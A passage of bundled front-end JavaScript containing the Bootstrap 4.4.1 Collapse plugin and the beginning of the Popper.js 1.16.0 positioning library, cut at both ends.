JQUERY_NO_CONFLICT$2; return Carousel._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$3 = 'collapse'; var VERSION$3 = '4.4.1'; var DATA_KEY$3 = 'bs.collapse'; var EVENT_KEY$3 = "." + DATA_KEY$3; var DATA_API_KEY$3 = '.data-api'; var JQUERY_NO_CONFLICT$3 = $.fn[NAME$3]; var Default$1 = { toggle: true, parent: '' }; var DefaultType$1 = { toggle: 'boolean', parent: '(string|element)' }; var Event$3 = { SHOW: "show" + EVENT_KEY$3, SHOWN: "shown" + EVENT_KEY$3, HIDE: "hide" + EVENT_KEY$3, HIDDEN: "hidden" + EVENT_KEY$3, CLICK_DATA_API: "click" + EVENT_KEY$3 + DATA_API_KEY$3 }; var ClassName$3 = { SHOW: 'show', COLLAPSE: 'collapse', COLLAPSING: 'collapsing', COLLAPSED: 'collapsed' }; var Dimension = { WIDTH: 'width', HEIGHT: 'height' }; var Selector$3 = { ACTIVES: '.show, .collapsing', DATA_TOGGLE: '[data-toggle="collapse"]' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Collapse = /*#__PURE__*/ function () { function Collapse(element, config) { this._isTransitioning = false; this._element = element; this._config = this._getConfig(config); this._triggerArray = [].slice.call(document.querySelectorAll("[data-toggle=\"collapse\"][href=\"#" + element.id + "\"]," + ("[data-toggle=\"collapse\"][data-target=\"#" + element.id + "\"]"))); var toggleList = [].slice.call(document.querySelectorAll(Selector$3.DATA_TOGGLE)); for (var i = 0, len = toggleList.length; i < len; i++) { var elem = toggleList[i]; var selector = Util.getSelectorFromElement(elem); var filterElement = [].slice.call(document.querySelectorAll(selector)).filter(function (foundElem) { return foundElem === element; }); if (selector !== null && filterElement.length > 0) { this._selector = selector; this._triggerArray.push(elem); } } this._parent = this._config.parent ? this._getParent() : null; if (!this._config.parent) { this._addAriaAndCollapsedClass(this._element, this._triggerArray); } if (this._config.toggle) { this.toggle(); } } // Getters var _proto = Collapse.prototype; // Public _proto.toggle = function toggle() { if ($(this._element).hasClass(ClassName$3.SHOW)) { this.hide(); } else { this.show(); } }; _proto.show = function show() { var _this = this; if (this._isTransitioning || $(this._element).hasClass(ClassName$3.SHOW)) { return; } var actives; var activesData; if (this._parent) { actives = [].slice.call(this._parent.querySelectorAll(Selector$3.ACTIVES)).filter(function (elem) { if (typeof _this._config.parent === 'string') { return elem.getAttribute('data-parent') === _this._config.parent; } return elem.classList.contains(ClassName$3.COLLAPSE); }); if (actives.length === 0) { actives = null; } } if (actives) { activesData = $(actives).not(this._selector).data(DATA_KEY$3); if (activesData && activesData._isTransitioning) { return; } } var startEvent = $.Event(Event$3.SHOW); $(this._element).trigger(startEvent); if (startEvent.isDefaultPrevented()) { return; } if (actives) { Collapse._jQueryInterface.call($(actives).not(this._selector), 'hide'); if (!activesData) { $(actives).data(DATA_KEY$3, null); } } var dimension = this._getDimension(); $(this._element).removeClass(ClassName$3.COLLAPSE).addClass(ClassName$3.COLLAPSING); this._element.style[dimension] = 0; if (this._triggerArray.length) { $(this._triggerArray).removeClass(ClassName$3.COLLAPSED).attr('aria-expanded', true); } this.setTransitioning(true); var complete = function complete() { $(_this._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).addClass(ClassName$3.SHOW); _this._element.style[dimension] = ''; _this.setTransitioning(false); $(_this._element).trigger(Event$3.SHOWN); }; var capitalizedDimension = dimension[0].toUpperCase() + dimension.slice(1); var scrollSize = "scroll" + capitalizedDimension; var transitionDuration = Util.getTransitionDurationFromElement(this._element); $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration); this._element.style[dimension] = this._element[scrollSize] + "px"; }; _proto.hide = function hide() { var _this2 = this; if (this._isTransitioning || !$(this._element).hasClass(ClassName$3.SHOW)) { return; } var startEvent = $.Event(Event$3.HIDE); $(this._element).trigger(startEvent); if (startEvent.isDefaultPrevented()) { return; } var dimension = this._getDimension(); this._element.style[dimension] = this._element.getBoundingClientRect()[dimension] + "px"; Util.reflow(this._element); $(this._element).addClass(ClassName$3.COLLAPSING).removeClass(ClassName$3.COLLAPSE).removeClass(ClassName$3.SHOW); var triggerArrayLength = this._triggerArray.length; if (triggerArrayLength > 0) { for (var i = 0; i < triggerArrayLength; i++) { var trigger = this._triggerArray[i]; var selector = Util.getSelectorFromElement(trigger); if (selector !== null) { var $elem = $([].slice.call(document.querySelectorAll(selector))); if (!$elem.hasClass(ClassName$3.SHOW)) { $(trigger).addClass(ClassName$3.COLLAPSED).attr('aria-expanded', false); } } } } this.setTransitioning(true); var complete = function complete() { _this2.setTransitioning(false); $(_this2._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).trigger(Event$3.HIDDEN); }; this._element.style[dimension] = ''; var transitionDuration = Util.getTransitionDurationFromElement(this._element); $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration); }; _proto.setTransitioning = function setTransitioning(isTransitioning) { this._isTransitioning = isTransitioning; }; _proto.dispose = function dispose() { $.removeData(this._element, DATA_KEY$3); this._config = null; this._parent = null; this._element = null; this._triggerArray = null; this._isTransitioning = null; } // Private ; _proto._getConfig = function _getConfig(config) { config = _objectSpread2({}, Default$1, {}, config); config.toggle = Boolean(config.toggle); // Coerce string values Util.typeCheckConfig(NAME$3, config, DefaultType$1); return config; }; _proto._getDimension = function _getDimension() { var hasWidth = $(this._element).hasClass(Dimension.WIDTH); return hasWidth ? Dimension.WIDTH : Dimension.HEIGHT; }; _proto._getParent = function _getParent() { var _this3 = this; var parent; if (Util.isElement(this._config.parent)) { parent = this._config.parent; // It's a jQuery object if (typeof this._config.parent.jquery !== 'undefined') { parent = this._config.parent[0]; } } else { parent = document.querySelector(this._config.parent); } var selector = "[data-toggle=\"collapse\"][data-parent=\"" + this._config.parent + "\"]"; var children = [].slice.call(parent.querySelectorAll(selector)); $(children).each(function (i, element) { _this3._addAriaAndCollapsedClass(Collapse._getTargetFromElement(element), [element]); }); return parent; }; _proto._addAriaAndCollapsedClass = function _addAriaAndCollapsedClass(element, triggerArray) { var isOpen = $(element).hasClass(ClassName$3.SHOW); if (triggerArray.length) { $(triggerArray).toggleClass(ClassName$3.COLLAPSED, !isOpen).attr('aria-expanded', isOpen); } } // Static ; Collapse._getTargetFromElement = function _getTargetFromElement(element) { var selector = Util.getSelectorFromElement(element); return selector ? document.querySelector(selector) : null; }; Collapse._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var $this = $(this); var data = $this.data(DATA_KEY$3); var _config = _objectSpread2({}, Default$1, {}, $this.data(), {}, typeof config === 'object' && config ? config : {}); if (!data && _config.toggle && /show|hide/.test(config)) { _config.toggle = false; } if (!data) { data = new Collapse(this, _config); $this.data(DATA_KEY$3, data); } if (typeof config === 'string') { if (typeof data[config] === 'undefined') { throw new TypeError("No method named \"" + config + "\""); } data[config](); } }); }; _createClass(Collapse, null, [{ key: "VERSION", get: function get() { return VERSION$3; } }, { key: "Default", get: function get() { return Default$1; } }]); return Collapse; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event$3.CLICK_DATA_API, Selector$3.DATA_TOGGLE, function (event) { // preventDefault only for elements (which change the URL) not inside the collapsible element if (event.currentTarget.tagName === 'A') { event.preventDefault(); } var $trigger = $(this); var selector = Util.getSelectorFromElement(this); var selectors = [].slice.call(document.querySelectorAll(selector)); $(selectors).each(function () { var $target = $(this); var data = $target.data(DATA_KEY$3); var config = data ? 'toggle' : $trigger.data(); Collapse._jQueryInterface.call($target, config); }); }); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$3] = Collapse._jQueryInterface; $.fn[NAME$3].Constructor = Collapse; $.fn[NAME$3].noConflict = function () { $.fn[NAME$3] = JQUERY_NO_CONFLICT$3; return Collapse._jQueryInterface; }; /**! * @fileOverview Kickass library to create and place poppers near their reference elements. * @version 1.16.0 * @license * Copyright (c) 2016 Federico Zivolo and contributors * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ var isBrowser = typeof window !== 'undefined' && typeof document !== 'undefined' && typeof navigator !== 'undefined'; var timeoutDuration = function () { var longerTimeoutBrowsers = ['Edge', 'Trident', 'Firefox']; for (var i = 0; i < longerTimeoutBrowsers.length; i += 1) { if (isBrowser && navigator.userAgent.indexOf(longerTimeoutBrowsers[i]) >= 0) { return 1; } } return 0; }(); function microtaskDebounce(fn) { var called = false; return function () { if (called) { return; } called = true; window.Promise.resolve().then(function () { called = false; fn(); }); }; } function taskDebounce(fn) { var scheduled = false; return function () { if (!scheduled) { scheduled = true; setTimeout(function () { scheduled = false; fn(); }, timeoutDuration); } }; } var supportsMicroTasks = isBrowser && window.Promise; /** * Create a debounced version of a method, that's asynchronously deferred * but called in the minimum time possible. * * @method * @memberof Popper.Utils * @argument {Function} fn * @returns {Function} */ var debounce = supportsMicroTasks ? microtaskDebounce : taskDebounce; /** * Check if the given variable is a function * @method * @memberof Popper.Utils * @argument {Any} functionToCheck - variable to check * @returns {Boolean} answer to: is a function? */ function isFunction(functionToCheck) { var getType = {}; return functionToCheck && getType.toString.call(functionToCheck) === '[object Function]'; } /** * Get CSS computed property of the given element * @method * @memberof Popper.Utils * @argument {Eement} element * @argument {String} property */ function getStyleComputedProperty(element, property) { if (element.nodeType !== 1) { return []; } // NOTE: 1 DOM access here var window = element.ownerDocument.defaultView; var css = window.getComputedStyle(element, null); return property ? css[property] : css; } /** * Returns the parentNode or the host of the element * @method * @memberof Popper.Utils * @argument {Element} element * @returns {Element} parent */ function getParentNode(element) { if (element.nodeName === 'HTML') { return element; } return element.parentNode || element.host; } /** * Returns the scrolling parent of the given element * @method * @memberof Popper.Utils * @argument {Element} element * @returns {Element} scroll parent */ function getScrollParent(element) { // Return body, `getScroll` will take care to get the correct `scrollTop` from it if (!element) { return document.body; } switch (element.nodeName) { case 'HTML': case 'BODY': return element.ownerDocument.body; case '#document': return element.body; } // Firefox want us to check `-x` and `-y` variations as well var _getStyleComputedProp = getStyleComputedProperty(element), overflow = _getStyleComputedProp.overflow, overflowX = _getStyleComputedProp.overflowX, overflowY = _getStyleComputedProp.overflowY; if (/(auto|scroll|overlay)/.test(overflow + overflowY + overflowX)) { return element; } return getScrollParent(getParentNode(element)); } /** * Returns the reference node of the reference object, or the reference object itself. * @method * @memberof Popper.Utils * @param {Element|Object} reference - the reference element (the popper will be relative to this) * @returns {Element} parent */ function getReferenceNode(reference) { return reference && reference.referenceNode ? reference.referenceNode : reference; } var isIE11 = isBrowser && !!(window.MSInputMethodContext && document.documentMode); var isIE10 = isBrowser && /MSIE 10/.test(navigator.userAgent); /** * Determines if the browser is Internet Explorer * @method * @memberof Popper.Utils * @param {Number} version to check * @returns {Boolean} isIE */ function isIE(version) { if (version === 11) { return isIE11; } if (version === 10) { return isIE10; } return isIE11 || isIE10; } /** * Returns the offset parent of the given element * @method * @memberof Popper.Utils * @argument {Element} element * @returns {Element} offset parent */ function getOffsetParent(element) { if (!element) { return document.documentElement; } var noOffsetParent = isIE(10) ? document.body : null; // NOTE: 1 DOM access here var offsetParent = element.offsetParent || null; // Skip hidden elements which don't have an offsetParent while (offsetParent === noOffsetParent && element.nextElementSibling) { offsetParent = (element = element.nextElementSibling).offsetParent; } var nodeName = offsetParent && offsetParent.nodeName; if (!nodeName || nodeName === 'BODY' || nodeName === 'HTML') { return element ? element.ownerDocument.documentElement : document.documentElement; } // .offsetParent will return the closest TH, TD or TABLE in case // no offsetParent is present, I hate this job... if (['TH', 'TD', 'TABLE'].indexOf(offsetParent.nodeName) !== -1 && getStyleComputedProperty(offsetParent, 'position') === 'static') { return getOffsetParent(offsetParent); } return offsetParent; } function isOffsetContainer(element) { var nodeName = element.nodeName; if (nodeName === 'BODY') { return false; } return nodeName === 'HTML' || getOffsetParent(element.firstElementChild) === element; } /** * Finds the root node (document, shadowDOM root) of the given element * @method * @memberof Popper.Utils * @argument {Element} node * @returns {Element} root node */ function getRoot(node) { if (node.parentNode !== null) { return getRoot(node.parentNode); } return node; } /** * Finds the offset parent common to the two provided nodes * @method * @memberof Popper.Utils * @argument {Element} element1 * @argument {Element} element2 * @returns {Element} common offset parent */ function findCommonOffsetParent(element1, element2) { // This check is needed to avoid errors in case one of the elements isn't defined for any reason if (!element1 || !element1.nodeType || !element2 || !element2.nodeType) { return document.documentElement; } // Here we make sure to give as "start" the element that comes first in the DOM var order = element1.compareDocumentPosition(element2) & Node.DOCUMENT_POSITION_FOLLOWING; var start = order ? element1 : element2; var end = order ? element2 : element1; // Get common ancestor container var range = document.createRange(); range.setStart(start, 0); range.setEnd(end, 0); var commonAncestorContainer = range.commonAncestorContainer; // Both nodes are inside #document if (element1 !== commonAncestorContainer && element2 !== commonAncestorContainer || start.contains(end)) { if (isOffsetContainer(commonAncestorContainer)) { return commonAncestorContainer; } return getOffsetParent(commonAncestorContainer); } // one of the nodes is inside shadowDOM, find which one var element1root = getRoot(element1); if (element1root.host) { return findCommonOffsetParent(element1root.host, element2); } else { return findCommonOffsetParent(element1, getRoot(element2).host); } } /** * Gets the scroll value of the given element in the given side (top and left) * @method * @memberof Popper.Utils * @argument {Element} element * @argument {String} side `top` or `left` * @returns {number} amount of scrolled pixels */ function getScroll(element) { var side = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'top'; var upperSide = side === 'top' ? 'scrollTop' : 'scrollLeft'; var nodeName = element.nodeName; if (nodeName === 'BODY' || nodeName === 'HTML') { var html = element.ownerDocument.documentElement; var scrollingElement = element.ownerDocument.scrollingElement || html; return scrollingElement[upperSide]; } return element[upperSide]; } /* * Sum or subtract the element scroll values (left and top) from a given rect object * @method * @memberof Popper.Utils * @param {Object} rect - Rect object you want to change * @param {HTMLElement} element - The element from the function reads the scroll values * @param {Boolean} subtract - set to true if you want to subtract the scroll values * @return {Object} rect - The modifier rect object */ function includeScroll(rect, element) { var subtract = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : false; var scrollTop = getScroll(element, 'top'); var scrollLeft = getScroll(element, 'left'); var modifier = subtract ? -1 : 1; rect.top += scrollTop * modifier; rect.bottom += scrollTop * modifier; rect.left += scrollLeft * modifier; rect.right += scrollLeft * modifier; return rect; } /* * Helper to detect borders of a given element * @method * @memberof Popper.Utils * @param {CSSStyleDeclaration} styles * Result of `getStyleComputedProperty` on the given element * @param {String} axis - `x` or `y` * @return {number} borders - The borders size of the given axis */ function getBordersSize(styles, axis) { var sideA = axis === 'x' ? 'Left' : 'Top'; var sideB = sideA === 'Left' ? 'Right' : 'Bottom'; return parseFloat(styles['border' + sideA + 'Width'], 10) + parseFloat(styles['border' + sideB + 'Width'], 10); } function getSize(axis, body, html, computedStyle) { return Math.max(body['offset' + axis], body['scroll' + axis], html['client' + axis], html['offset' + axis], html['scroll' + axis], isIE(10) ? parseInt(html['offset' + axis]) + parseInt(computedStyle['margin' + (axis === 'Height' ? 'Top' : 'Left')]) + parseInt(computedStyle['margin' + (axis === 'Height' ? 'Bottom' : 'Right')]) : 0); } function getWindowSizes(document) { var body = document.body; var html = document.documentElement; var computedStyle = isIE(10) && getComputedStyle(html); return { height: getSize('Height', body, html, computedStyle), width: getSize('Width', body, html, computedStyle) }; } var classCallCheck = function (instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }; var createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var defineProperty = function (obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }; var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; /** * Given element offsets, generate an output similar to getBoundingClientRect * @method * @memberof Popper.Utils * @argument {Object} offsets * @returns {Object} ClientRect like output */ function getClientRect(offsets) { return _extends({}, offsets, { right: offsets.left + offsets.width, bottom: offsets.top + offsets.height }); } /** * Get bounding client rect of given element * @method * @memberof Popper.Utils * @param {HTMLElement} element * @return {Object} client rect */ function getBoundingClientRect(element) { var rect = {}; // IE10 10 FIX: Please, don't ask, the element isn't // considered in DOM in some circumstances... // This isn't reproducible in IE10 compatibility mode of IE11 try { if (isIE(10)) { rect = element.getBoundingClientRect(); var scrollTop = getScroll(element, 'top'); var scrollLeft = getScroll(element, 'left'); rect.top += scrollTop; rect.left += scrollLeft; rect.bottom += scrollTop; rect.right += scrollLeft; } else { rect = element.getBoundingClientRect(); } } catch (e) {} var result = { left: rect.left, top: rect.top, width: rect.right - rect.left, height: rect.bottom - rect.top }; // subtract scrollbar size from sizes var sizes = element.nodeName === 'HTML' ? getWindowSizes(element.ownerDocument) : {}; var width = sizes.width || element.clientWidth || result.width; var height = sizes.height || element.clientHeight || result.height; var horizScrollbar = element.offsetWidth - width; var vertScrollbar = element.offsetHeight - height; // if an hypothetical scrollbar is detected, we must be sure it's not a `border` // we make this check conditional for performance reasons if (horizScrollbar || vertScrollbar) { var styles = getStyleComputedProperty(element); horizScrollbar -= getBordersSize(styles, 'x'); vertScrollbar -= getBordersSize(styles, 'y'); result.width -= horizScrollbar; result.height -= vertScrollbar; } return getClientRect(result); } function getOffsetRectRelativeToArbitraryNode(children, parent) { var fixedPosition = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : false; var isIE10 = isIE(10); var isHTML = parent.nodeName === 'HTML'; var childrenRect = getBoundingClientRect(children); var parentRect = getBoundingClientRect(parent); var scrollParent = getScrollParent(children); var styles = getStyleComputedProperty(parent); var borderTopWidth = parseFloat(styles.borderTopWidth, 10); var borderLeftWidth = parseFloat(styles.borderLeftWidth, 10); // In cases where the parent is fixed, we must ignore negative scroll in offset calc if (fixedPosition && isHTML) { parentRect.top = Math.max(parentRect.top, 0); parentRect.left = Math.max(parentRect.left, 0); } var offsets = getClientRect({ top: childrenRect.top - parentRect.top - borderTopWidth, left: childrenRect.left - parentRect.left - borderLeftWidth, width: childrenRect.width, height: childrenRect.height }); offsets.marginTop = 0; offsets.marginLeft = 0; // Subtract margins of documentElement in case it's being used as parent // we do this only on HTML because it's the only element that behaves // differently when margins are applied to it. The margins are included in // the box of the documentElement, in the other cases not. if (!isIE10 && isHTML) { var marginTop = parseFloat(styles.marginTop, 10); var marginLeft = parseFloat(styles.marginLeft, 10); offsets.top -= borderTopWidth - marginTop; offsets.bottom -= borderTopWidth - marginTop; offsets.left -= borderLeftWidth - marginLeft; offsets.right -= borderLeftWidth - marginLeft; // Attach marginTop and marginLeft because in some circumstances we may need them offsets.marginTop = marginTop; offsets.marginLeft = marginLeft; } if (isIE10 && !fixedPosition ? parent.contains(scrollParent) : parent === scrollParent && scrollParent.nodeName !== 'BODY') { offsets = includeScroll(offsets, parent); } return offsets; } function getViewportOffsetRectRelativeToArtbitraryNode(element) { var excludeScroll = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false; var html = element.ownerDocument.documentElement; var relativeOffset = getOffsetRectRelativeToArbitraryNode(element, html); var width = Math.max(html.clientWidth, window.innerWidth || 0); var height = Math.max(html.clientHeight, window.innerHeight || 0); var scrollTop = !excludeScroll ? getScroll(html) : 0; var scrollLeft = !excludeScroll ? getScroll(html, 'left') : 0; var offset = { top: scrollTop - relativeOffset.top + relativeOffset.marginTop, left: scrollLeft - relativeOffset.left + relativeOffset.marginLeft, width: width, height: height }; return getClientRect(offset); } /** * Check if the given element is fixed or is inside a fixed parent * @method * @memberof Popper.Utils * @argument {Element} element * @argument {Element} customContainer * @returns {Boolean} answer to "isFixed?" */ function isFixed(element) { var nodeName = element.nodeName; if (nodeName === 'BODY' || nodeName === 'HTML') { return false; } if (getStyleComputedProperty(element, 'position') === 'fixed') { return true; } var parentNode = getParentNode(element); if (!parentNode) { return false; } return isFixed(parentNode); } /** * Finds the first parent of an element that has a transformed property defined * @method * @memberof Popper.Utils * @argument {Element} element * @returns {Element} first transformed parent or documentElement */ function getFixedPositionOffsetParent(element) { // This check is needed to avoid errors in case one of the elements isn't defined for any reason if (!element || !element.parentElement || isIE()) { return document.documentElement; } var el = element.parentElement; while (el && getStyleComputedProperty(el, 'transform') === 'none') { el = el.parentElement; } return el || document.documentElement; } /** * Computed the boundaries limits and return them * @method * @memberof Popper.Utils * @param {HTMLElement} popper * @param {HTMLElement} reference * @param {number} padding * @param {HTMLElement} boundariesElement - Element used to define the boundaries * @param {Boolean} fixedPosition - Is in fixed position mode * @returns {Object} Coordinates of the boundaries */ function getBoundaries(popper, reference, padding, boundariesElement) { var fixedPosition = arguments.length > 4 && arguments[4] !== undefined ? arguments[4] : false; // NOTE: 1 DOM access here var boundaries = { top: 0, left: 0 }; var offsetParent = fixedPosition ? getFixedPositionOffsetParent(popper) : findCommonOffsetParent(popper, getReferenceNode(reference)); // Handle viewport case if (boundariesElement === 'viewport') { boundaries = getViewportOffsetRectRelativeToArtbitraryNode(offsetParent, fixedPosition); } else { // Handle other cases based on DOM element used as boundaries var boundariesNode = void 0; if (boundariesElement === 'scrollParent') { boundariesNode = getScrollParent(getParentNode(reference)); if (boundariesNode.nodeName === 'BODY') { boundariesNode = popper.ownerDocument.documentElement; } } else if (boundariesElement === 'window') { boundariesNode = popper.ownerDocument.documentElement; } else { boundariesNode = boundariesElement; } var offsets = getOffsetRectRelativeToArbitraryNode(boundariesNode, offsetParent, fixedPosition); // In case of HTML, we need a different computation if (boundariesNode.nodeName === 'HTML' && !isFixed(offsetParent)) { var _getWindowSizes = getWindowSizes(popper.ownerDocument), height = _getWindowSizes.height, width = _getWindowSizes.width; boundaries.top += offsets.top - offsets.marginTop; boundaries.bottom = height + offsets.top; boundaries.left += offsets.left - offsets.marginLeft; boundaries.right = width + offsets.left; } else { // for all the other DOM elements, this one is good boundaries = offsets; } } // Add paddings padding = padding || 0; var isPaddingNumber = typeof padding === 'number'; boundaries.left += isPaddingNumber ? padding : padding.left || 0; boundaries.top += isPaddingNumber ? padding : padding.top || 0; boundaries.right -= isPaddingNumber ? padding : padding.right || 0; boundaries.bottom -= isPaddingNumber ? padding : padding.bottom || 0; return boundaries; } function getArea(_ref) { var width = _ref.width, height = _ref.height; return width * height; } /** * Utility used to transform the `auto` placement to the placement with more * available space. * @method * @memberof Popper.Utils * @argument {Object} data - The data object generated by update method * @argument {Object} options - Modifiers configuration and options * @returns {Object} The data object, properly modified */ function computeAutoPlacement(placement, refRect, popper, reference, boundariesElement) { var padding = arguments.length > 5 && arguments[5] !== undefined ? arguments[5] : 0; if (placement.indexOf('auto') === -1) { return placement; } var boundaries = getBoundaries(popper, reference, padding, boundariesElement); var rects = { top: { width: boundaries.width, height: refRect.top - boundaries.top }, right: { width: boundaries.right - refRect.right, height: boundaries.height }, bottom: { width: boundaries.width, height: boundaries.bottom - refRect.bottom }, left: { width: refRect.left - boundaries.left, height: boundaries.height } }; var sortedAreas = Object.keys(rects).map(function (key) { return _extends({ key: key }, rects[key], { area: getArea(rects[key]) }); }).sort(function (a, b) { return b.area - a.area; }); var filteredAreas = sortedAreas.filter(function (_ref2) { var width = _ref2.width, height = _ref2.height; return width >= popper.clientWidth && height >= popper.clientHeight; }); var computedPlacement = filteredAreas.length > 0 ? filteredAreas[0].key : sortedAreas[0].key; var variation = placement.split('-')[1]; return computedPlacement + (variation ? '-' + variation : ''); } /** * Get offsets to the reference element * @method * @memberof Popper.Utils * @param {Object} state * @param {Element} popper - the popper element * @param {Element} reference - the reference element (the popper will be relative to this) * @param {Element} fixedPosition - is in fixed position mode * @returns {Object} An object containing the offsets which will be applied to the popper */ function getReferenceOffsets(state, popper, reference) { var fixedPosition = arguments.length > 3 && arguments[3] !== undefined ? arguments[3] : null; var commonOffsetParent = fixedPosition ? getFixedPositionOffsetParent(popper) : findCommonOffsetParent(popper, getReferenceNode(reference)); return getOffsetRectRelativeToArbitraryNode(reference, commonOffsetParent, fixedPosition); } /** * Get the outer sizes of the given element (offset size + margins) * @method * @memberof Popper.Utils * @argument {Element} element * @returns {Object} object containing width and height properties */ function getOuterSizes(element) { var window = element.ownerDocument.defaultView; var styles = window.getComputedStyle(element); var x = parseFloat(styles.marginTop || 0) + parseFloat(styles.marginBottom || 0); var y = parseFloat(styles.marginLeft || 0) + parseFloat(styles.marginRight || 0); var result = { width: element.offsetWidth + y, height: element.offsetHeight + x }; return result; } /** * Get the opposite placement of the given one * @method * @memberof Popper.Utils * @argument {String} placement * @returns {String} flipped placement */ function getOppositePlacement(placement) { var hash = { left: 'right', right: 'left', bottom: 'top', top: 'bottom' }; return placement.replace(/left|right|bottom|top/g, function (matched) { return hash[matched]; }); } /** * Get offsets to the popper * @method * @memberof Popper.Utils * @param {Object} position - CSS position the Popper will get applied * @param {HTMLElement} popper - the popper element * @param {Object} referenceOffsets - the reference offsets (the popper will be relative to this) * @param {String} placement - one of the valid placement options * @returns {Object} popperOffsets - An object containing the offsets which will be applied to the popper */ function getPopperOffsets(popper, referenceOffsets, placement) { placement = placement.split('-')[0]; // Get popper node sizes var popperRect = getOuterSizes(popper); // Add position, width and height to our offsets object var popperOffsets = { width: popperRect.width, height: popperRect.height }; // depending by the popper placement we have to compute its offsets slightly differently var isHoriz = ['right', 'left'].indexOf(placement) !== -1; var mainSide = isHoriz ? 'top' : 'left'; var secondarySide = isHoriz ? 'left' : 'top'; var measurement = isHoriz ? 'height' : 'width'; var secondaryMeasurement = !isHoriz ? 'height' : 'width'; popperOffsets[mainSide] = referenceOffsets[mainSide] + referenceOffsets[measurement] / 2 - popperRect[measurement] / 2; if (placement === secondarySide) { popperOffsets[secondarySide] = referenceOffsets[secondarySide] - popperRect[secondaryMeasurement]; } else { popperOffsets[secondarySide] = referenceOffsets[getOppositePlacement(secondarySide)]; } return popperOffsets; } /** * Mimics the `find` method of Array * @method * @memberof Popper.Utils * @argument {Array} arr * @argument prop * @argument value * @returns index or -1 */ function find(arr, check) { // use native find if supported if (Array.prototype.find) { return arr.find(check); } // use `filter` to obtain the same behavior of `find` return arr.filter(check)[0]; } /** * Return the index of the matching object * @method * @memberof Popper.Utils * @argument {Array} arr * @argument prop * @argument value * @returns index or -1 */ function findIndex(arr, prop, value) { // use native findIndex if supported if (Array.prototype.findIndex) { return arr.findIndex(function (cur) { return cur[prop] === value; }); } // use `find` + `indexOf` if `findIndex` isn't supported var match = find(arr, function (obj) { return obj[prop] === value; }); return arr.indexOf(match); } /** * Loop trough the list of modifiers and run them in order, * each of them will then edit the data object. * @method * @memberof Popper.Utils * @param {dataObject} data * @param {Array} modifiers * @param {String} ends - Optional modifier name used as stopper * @returns {dataObject} */ function runModifiers(modifiers, data, ends) { var modifiersToRun = ends === undefined ? modifiers : modifiers.slice(0, findIndex(modifiers, 'name', ends)); modifiersToRun.forEach(function (modifier) { if (modifier['function']) { // eslint-disable-line dot-notation console.warn('`modifier.function` is deprecated, use `modifier.fn`!'); } var fn = modifier['function'] || modifier.fn; // eslint-disable-line dot-notation if (modifier.enabled && isFunction(fn)) { // Add properties to offsets to make them a complete clientRect object // we do this before each modifier to make sure the previous one doesn't // mess with these values data.offsets.popper = getClientRect(data.offsets.popper); data.offsets.reference = getClientRect(data.offsets.reference); data = fn(data, modifier); } }); return data; } /** * Updates the position of the popper, computing the new offsets and applying * the new style.
* Prefer `scheduleUpdate` over `update` because of performance reasons. * @method * @memberof Popper */ function update() { // if popper is destroyed, don't perform any further update if (this.state.isDestroyed) { return; } var data = { instance: this, styles: {}, arrowStyles: {}, attributes: {}, flipped: false, offsets: {} }; // compute reference element offsets data.offsets.reference = getReferenceOffsets(this.state, this.popper, this.reference, this.options.positionFixed); // compute auto placement, store placement inside the data object, // modifiers will be able to edit `placement` if needed // and refer to originalPlacement to know the original value data.placement = computeAutoPlacement(this.options.placement, data.offsets.reference, this.popper, this.reference, this.options.modifiers.flip.boundariesElement, this.options.modifiers.flip.padding); // store the computed placement inside `originalPlacement` data.originalPlacement = data.placement; data.positionFixed = this.options.positionFixed; // compute the popper offsets data.offsets.popper = getPopperOffsets(this.popper, data.offsets.reference, data.placement); data.offsets.popper.position = this.options.positionFixed ? 'fixed' : 'absolute'; // run the modifiers data = runModifiers(this.modifiers, data); // the first `update` will call `onCreate` callback // the other ones will call `onUpdate` callback if (!this.state.isCreated) { this.state.isCreated = true; this.options.onCreate(data); } else { this.options.onUpdate(data); } } /** * Helper used to know if the given modifier is enabled. * @method * @memberof 